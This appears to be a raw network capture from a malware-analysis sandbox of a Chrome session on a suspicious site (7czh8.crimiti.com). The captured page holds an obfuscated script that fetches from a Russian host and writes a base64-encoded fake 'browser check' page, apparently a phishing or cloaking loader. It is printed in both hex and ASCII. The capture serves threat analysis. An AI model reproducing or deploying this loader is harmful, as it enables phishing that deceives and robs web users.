                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:35 UTC1009INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:35 GMT
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Cache-Control: no-cache, private
                                                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3fO57ZKRdavLC8WPRQ%2FoSwU%2BFjNdtQUOecqePu8FqWQRZUQVqY6l4rWfPJhPMMMRgJyKA5ftWp%2B1Qdo6h2QlRVZowdqqazn%2F6NoqQiTMPtIs%2BFjLht4Smz2wxRo3Ww%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Set-Cookie: XSRF-TOKEN=eyJpdiI6IjZIZ2VUZkEyVHFDc2YyUjQyRVRBZ1E9PSIsInZhbHVlIjoiTWZ2aU9NRnZFNXBQUUx0N1YrbkFWbDFxeGJVUk9IVE1GMCtCOWtGMWhpRWlVeGQ4STdMRm94c0ErQ2EzemFhZ1NDdE8wYjJySE1CSlVVL2NtYjlZbjRSQ3FXS0JFcXovb09yMnQ1WEZxUHpBK0pmRGJyODhrUlZBODR3SmVjNisiLCJtYWMiOiIzOWRmODZhNmQ0ZDNjMmMwYzNhYjE1YjdkNWI3MDY3MzZlZDFlOWQ5MjY4MDJmODg3NDIyOTdhNjZhZTQ4OTMxIiwidGFnIjoiIn0%3D; expires=Wed, 21-Aug-2024 20:28:35 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                                                                                                                                                                      2024-08-21 18:28:35 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6a 68 4b 52 46 52 33 61 6d 77 78 54 55 5a 58 51 57 52 75 4e 7a 41 72 59 58 46 6d 5a 6d 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 55 31 68 76 55 32 5a 79 52 48 67 35 4f 48 59 33 57 44 52 36 51 6d 6c 4d 52 33 64 48 4d 32 70 6a 53 6c 4e 6e 56 58 64 32 51 6b 68 73 65 6e 5a 6a 63 7a 6c 57 57 54 52 6c 54 6d 4a 35 53 58 56 59 52 44 6b 77 55 6a 64 6f 53 30 46 4e 56 54 5a 76 61 58 6c 7a 4e 43 74 58 4c 31 5a 54 65 6d 6c 71 4e 46 4d 35 65 54 64 72 64 55 4e 48 59 31 55 76 59 32 55 7a 4b 33 6c 42 52 46 49 78 64 47 56 76 62 69 39 44 54 30 64 6b 63 46 5a 4f 62 48 64 69 56 7a 4e 47 51 7a 4a 4b 64 6a 68 4a 52 54 4e 32 4e 46 4a 77 64 45 77 78 57 46 6b
                                                                                                                                                                                                                                                                      Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IjhKRFR3amwxTUZXQWRuNzArYXFmZmc9PSIsInZhbHVlIjoiU1hvU2ZyRHg5OHY3WDR6QmlMR3dHM2pjSlNnVXd2QkhsenZjczlWWTRlTmJ5SXVYRDkwUjdoS0FNVTZvaXlzNCtXL1ZTemlqNFM5eTdrdUNHY1UvY2UzK3lBRFIxdGVvbi9DT0dkcFZObHdiVzNGQzJKdjhJRTN2NFJwdEwxWFk
                                                                                                                                                                                                                                                                      2024-08-21 18:28:35 UTC1369INData Raw: 31 37 63 61 0d 0a 3c 73 63 72 69 70 74 3e 66 65 74 63 68 28 27 68 74 74 70 73 3a 2f 2f 47 68 64 2e 64 75 6c 74 7a 6d 61 6e 2e 72 75 2f 6c 62 6a 75 67 79 62 63 6c 74 69 6d 73 66 76 68 68 6e 6a 6e 65 70 73 63 70 74 56 51 67 45 46 43 6a 56 58 47 57 45 52 4e 47 4b 42 4f 56 53 4f 4b 47 42 43 45 44 42 46 4b 47 59 4a 46 27 2c 20 7b 0d 0a 6d 65 74 68 6f 64 3a 20 22 47 45 54 22 2c 0d 0a 7d 29 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 7b 0d 0a 72 65 74 75 72 6e 20 72 65 73 70 6f 6e 73 65 2e 74 65 78 74 28 29 0d 0a 7d 29 2e 74 68 65 6e 28 74 65 78 74 20 3d 3e 20 7b 0d 0a 69 66 28 74 65 78 74 20 3d 3d 20 30 29 7b 20 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62
                                                                                                                                                                                                                                                                      Data Ascii: 17ca<script>fetch('https://Ghd.dultzman.ru/lbjugybcltimsfvhhnjnepscptVQgEFCjVXGWERNGKBOVSOKGBCEDBFKGYJF', {method: "GET",}).then(response => {return response.text()}).then(text => {if(text == 0){ document.write(decodeURIComponent(escape(atob
                                                                                                                                                                                                                                                                      2024-08-21 18:28:35 UTC1369INData Raw: 61 45 68 54 53 79 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 30 5a 4f 63 55 46 55 65 57 68 49 55 30 73 75 59 32 39 75 64 47 46 70 62 6d 56 79 65 33 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 33 42 68 5a 47 52 70 62 6d 63 74 63 6d 6c 6e 61 48 51 36 49 48 5a 68 63 69 67 74 4c 57 4a 7a 4c 57 64 31 64 48 52 6c 63 69 31 34 4c 43 41 75 4e 7a 56 79 5a 57 30 70 4f 33 42 68 5a 47 52 70 62 6d 63 74 62 47 56 6d 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 62 57 46 79 5a 32 6c 75 4c 58 4a 70 5a 32 68 30 4f 69 42 68 64 58 52 76 4f 32 31 68 63 6d 64 70 62 69 31 73 5a 57 5a 30 4f 69 42
                                                                                                                                                                                                                                                                      Data Ascii: aEhTSyBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI0ZOcUFUeWhIU0suY29udGFpbmVye3dpZHRoOiAxMDAlO3BhZGRpbmctcmlnaHQ6IHZhcigtLWJzLWd1dHRlci14LCAuNzVyZW0pO3BhZGRpbmctbGVmdDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7bWFyZ2luLXJpZ2h0OiBhdXRvO21hcmdpbi1sZWZ0OiB
                                                                                                                                                                                                                                                                      2024-08-21 18:28:35 UTC1369INData Raw: 47 46 32 5a 58 4a 68 5a 32 55 67 62 57 46 75 4c 43 42 33 61 58 52 6f 49 47 78 68 63 32 56 79 4c 57 78 70 61 32 55 67 5a 6d 39 6a 64 58 4d 75 49 43 30 74 50 67 6f 38 59 6d 39 6b 65 53 42 7a 64 48 6c 73 5a 54 30 69 5a 6d 39 75 64 43 31 6d 59 57 31 70 62 48 6b 36 49 47 46 79 61 57 46 73 4c 43 42 7a 59 57 35 7a 4c 58 4e 6c 63 6d 6c 6d 4f 32 4a 68 59 32 74 6e 63 6d 39 31 62 6d 51 74 59 32 39 73 62 33 49 36 49 43 4e 6d 5a 6d 59 37 59 32 39 73 62 33 49 36 49 43 4d 77 4d 44 41 37 63 47 46 6b 5a 47 6c 75 5a 7a 6f 67 4d 6a 42 77 65 44 74 6d 62 32 35 30 4c 58 4e 70 65 6d 55 36 49 44 45 34 63 48 67 37 62 33 5a 6c 63 6e 4e 6a 63 6d 39 73 62 43 31 69 5a 57 68 68 64 6d 6c 76 63 6a 6f 67 59 32 39 75 64 47 46 70 62 6a 73 69 50 67 30 4b 50 47 52 70 64 69 42 70 5a 44 30 69
                                                                                                                                                                                                                                                                      Data Ascii: GF2ZXJhZ2UgbWFuLCB3aXRoIGxhc2VyLWxpa2UgZm9jdXMuIC0tPgo8Ym9keSBzdHlsZT0iZm9udC1mYW1pbHk6IGFyaWFsLCBzYW5zLXNlcmlmO2JhY2tncm91bmQtY29sb3I6ICNmZmY7Y29sb3I6ICMwMDA7cGFkZGluZzogMjBweDtmb250LXNpemU6IDE4cHg7b3ZlcnNjcm9sbC1iZWhhdmlvcjogY29udGFpbjsiPg0KPGRpdiBpZD0i
                                                                                                                                                                                                                                                                      2024-08-21 18:28:35 UTC1369INData Raw: 6c 74 61 31 64 76 52 6c 67 69 50 67 30 4b 55 6e 56 75 62 6d 6c 75 5a 79 42 69 63 6d 39 33 63 32 56 79 49 47 4e 6f 5a 57 4e 72 63 79 42 30 62 79 42 7a 5a 57 4e 31 63 6d 55 67 65 57 39 31 63 69 42 68 59 32 4e 6c 63 33 4d 75 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 77 68 4c 53 30 67 50 47 52 70 64 6a 35 54 64 57 4e 6a 5a 58 4e 7a 49 47 31 6c 59 57 35 7a 49 47 52 76 61 57 35 6e 49 48 52 6f 5a 53 42 69 5a 58 4e 30 49 48 64 6c 49 47 4e 68 62 69 42 33 61 58 52 6f 49 48 64 6f 59 58 51 67 64 32 55 67 61 47 46 32 5a 53 34 67 55 33 56 6a 59 32 56 7a 63 79 42 70 63 79 42 30 61 47 55 67 5a 47 39 70 62 6d 63 73 49 47 35 76 64 43 42 30 61 47 55 67 5a 32 56 30 64 47 6c 75 5a 7a 73 67 61 57 34 67 64 47 68 6c 49 48 52 79 65 57 6c 75 5a 79 77 67 62 6d 39 30 49 48 52 6f 5a
                                                                                                                                                                                                                                                                      Data Ascii: lta1dvRlgiPg0KUnVubmluZyBicm93c2VyIGNoZWNrcyB0byBzZWN1cmUgeW91ciBhY2Nlc3MuDQo8L2Rpdj4NCjwhLS0gPGRpdj5TdWNjZXNzIG1lYW5zIGRvaW5nIHRoZSBiZXN0IHdlIGNhbiB3aXRoIHdoYXQgd2UgaGF2ZS4gU3VjY2VzcyBpcyB0aGUgZG9pbmcsIG5vdCB0aGUgZ2V0dGluZzsgaW4gdGhlIHRyeWluZywgbm90IHRoZ
                                                                                                                                                                                                                                                                      2024-08-21 18:28:35 UTC622INData Raw: 6e 4c 33 68 35 63 57 70 35 61 6d 5a 35 61 32 38 32 53 30 64 6a 61 54 52 4b 54 30 39 59 63 31 70 74 55 6d 52 44 51 33 70 6d 4d 58 64 69 63 6d 74 30 61 6e 4e 72 5a 33 70 71 5a 6a 39 6c 65 58 6c 7a 63 48 6c 61 54 55 5a 4d 55 6b 4a 4d 52 55 31 43 56 55 4e 52 55 45 64 53 52 45 56 4c 52 46 56 57 53 6b 4a 57 56 6b 52 45 53 6b 6c 54 52 6c 46 54 57 6b 5a 43 51 56 46 46 57 55 78 49 52 33 46 6f 61 58 5a 78 61 57 56 30 63 6d 35 30 63 32 35 79 5a 47 74 35 5a 57 5a 68 59 6e 64 32 59 6d 6c 79 62 47 39 79 63 47 4e 74 62 57 6c 68 65 47 6c 68 59 33 4a 6f 65 6e 6c 6d 4a 7a 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 66 51 30 4b 49 43 41 67 49 48 30 70 4f 77 30 4b 66 51 30 4b 50 43 39 7a 59 33 4a 70 63 48 51 2b 44 51 6f 38 49 53 30 74 49 44 78 6b 61 58 59 2b 55 33 56 6a 59 32
                                                                                                                                                                                                                                                                      Data Ascii: nL3h5cWp5amZ5a282S0djaTRKT09Yc1ptUmRDQ3pmMXdicmt0anNrZ3pqZj9leXlzcHlaTUZMUkJMRU1CVUNRUEdSREVLRFVWSkJWVkRESklTRlFTWkZCQVFFWUxIR3FoaXZxaWV0cm50c25yZGt5ZWZhYnd2YmlybG9ycGNtbWlheGlhY3JoenlmJzsNCiAgICAgICAgfQ0KICAgIH0pOw0KfQ0KPC9zY3JpcHQ+DQo8IS0tIDxkaXY+U3VjY2
                                                                                                                                                                                                                                                                      2024-08-21 18:28:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      8192.168.2.549725184.28.90.27443
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:36 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                                      If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                      Range: bytes=0-2147483646
                                                                                                                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                      Host: fs.microsoft.com
                                                                                                                                                                                                                                                                      2024-08-21 18:28:36 UTC514INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      ApiVersion: Distribute 1.1
                                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                      Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                                                                                      X-CID: 11
                                                                                                                                                                                                                                                                      X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                                      X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=80025
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:36 GMT
                                                                                                                                                                                                                                                                      Content-Length: 55
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      X-CID: 2
                                                                                                                                                                                                                                                                      2024-08-21 18:28:36 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                                                                      Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      9192.168.2.549724188.114.96.34432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:36 UTC1318OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                                                                      Host: 7czh8.crimiti.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://7czh8.crimiti.com/3aqy/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IjZIZ2VUZkEyVHFDc2YyUjQyRVRBZ1E9PSIsInZhbHVlIjoiTWZ2aU9NRnZFNXBQUUx0N1YrbkFWbDFxeGJVUk9IVE1GMCtCOWtGMWhpRWlVeGQ4STdMRm94c0ErQ2EzemFhZ1NDdE8wYjJySE1CSlVVL2NtYjlZbjRSQ3FXS0JFcXovb09yMnQ1WEZxUHpBK0pmRGJyODhrUlZBODR3SmVjNisiLCJtYWMiOiIzOWRmODZhNmQ0ZDNjMmMwYzNhYjE1YjdkNWI3MDY3MzZlZDFlOWQ5MjY4MDJmODg3NDIyOTdhNjZhZTQ4OTMxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhKRFR3amwxTUZXQWRuNzArYXFmZmc9PSIsInZhbHVlIjoiU1hvU2ZyRHg5OHY3WDR6QmlMR3dHM2pjSlNnVXd2QkhsenZjczlWWTRlTmJ5SXVYRDkwUjdoS0FNVTZvaXlzNCtXL1ZTemlqNFM5eTdrdUNHY1UvY2UzK3lBRFIxdGVvbi9DT0dkcFZObHdiVzNGQzJKdjhJRTN2NFJwdEwxWFkiLCJtYWMiOiJmODk2ODE5ZmE3OWVhYTM1Y2UzN2E5NmJiNTgyZjEzNzRkZTJmZjMzZGM0M2ZkMTQ0NTIwYmY1ODAxZDUzNjRmIiwidGFnIjoiIn0%3D
                                                                                                                                                                                                                                                                      2024-08-21 18:28:36 UTC639INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:36 GMT
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qEJ3TWSfsmU0s7ynoHj90bDtQ6IVSQj3x35BkB4RjqYJDL4Two7Z4SKm9fVaj%2BMxhQBu8JIl1Zn%2FAnA5KBHEJaVSdbCKoZWUkPRrSsUP0dzF9WFFehABgtP%2FVTB9RA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Age: 7729
                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                      CF-RAY: 8b6caf0fba394402-EWR
                                                                                                                                                                                                                                                                      2024-08-21 18:28:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      10192.168.2.54973035.190.80.14432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:37 UTC536OUTOPTIONS /report/v4?s=qEJ3TWSfsmU0s7ynoHj90bDtQ6IVSQj3x35BkB4RjqYJDL4Two7Z4SKm9fVaj%2BMxhQBu8JIl1Zn%2FAnA5KBHEJaVSdbCKoZWUkPRrSsUP0dzF9WFFehABgtP%2FVTB9RA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                      Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      Origin: https://7czh8.crimiti.com
                                                                                                                                                                                                                                                                      Access-Control-Request-Method: POST
                                                                                                                                                                                                                                                                      Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:37 UTC336INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                      access-control-max-age: 86400
                                                                                                                                                                                                                                                                      access-control-allow-methods: OPTIONS, POST
                                                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                                                      access-control-allow-headers: content-type, content-length
                                                                                                                                                                                                                                                                      date: Wed, 21 Aug 2024 18:28:37 GMT
                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      11192.168.2.549729188.114.97.34432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:37 UTC607OUTGET /lbjugybcltimsfvhhnjnepscptVQgEFCjVXGWERNGKBOVSOKGBCEDBFKGYJF HTTP/1.1
                                                                                                                                                                                                                                                                      Host: ghd.dultzman.ru
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Origin: https://7czh8.crimiti.com
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Referer: https://7czh8.crimiti.com/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:39 UTC608INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:39 GMT
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M5onKWRsCu2rt5%2BcqZETKlebHznT4%2Bs9xZH56%2BTLmJVMEzibXFALd1xZwpfK2PoFIEv1qbns8q4lKeu8eQhxtwayqYQ5B43SnqZmSO8k9cbwu5rQjtoc%2BzCiJ6iyKJOYbiY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                      CF-RAY: 8b6caf15c9a67d24-EWR
                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:39 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 11
                                                                                                                                                                                                                                                                      2024-08-21 18:28:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      12192.168.2.54973335.190.80.14432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:37 UTC476OUTPOST /report/v4?s=qEJ3TWSfsmU0s7ynoHj90bDtQ6IVSQj3x35BkB4RjqYJDL4Two7Z4SKm9fVaj%2BMxhQBu8JIl1Zn%2FAnA5KBHEJaVSdbCKoZWUkPRrSsUP0dzF9WFFehABgtP%2FVTB9RA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                      Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      Content-Length: 428
                                                                                                                                                                                                                                                                      Content-Type: application/reports+json
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:37 UTC428OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 33 33 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 37 63 7a 68 38 2e 63 72 69 6d 69 74 69 2e 63 6f 6d 2f 33 61 71 79 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 36 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22
                                                                                                                                                                                                                                                                      Data Ascii: [{"age":0,"body":{"elapsed_time":133,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://7czh8.crimiti.com/3aqy/","sampling_fraction":1.0,"server_ip":"188.114.96.3","status_code":404,"type":"http.error"},"type":"network-error","
                                                                                                                                                                                                                                                                      2024-08-21 18:28:38 UTC168INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                      date: Wed, 21 Aug 2024 18:28:37 GMT
                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      13192.168.2.549738188.114.96.34432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:40 UTC399OUTGET /lbjugybcltimsfvhhnjnepscptVQgEFCjVXGWERNGKBOVSOKGBCEDBFKGYJF HTTP/1.1
                                                                                                                                                                                                                                                                      Host: ghd.dultzman.ru
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC614INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:42 GMT
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
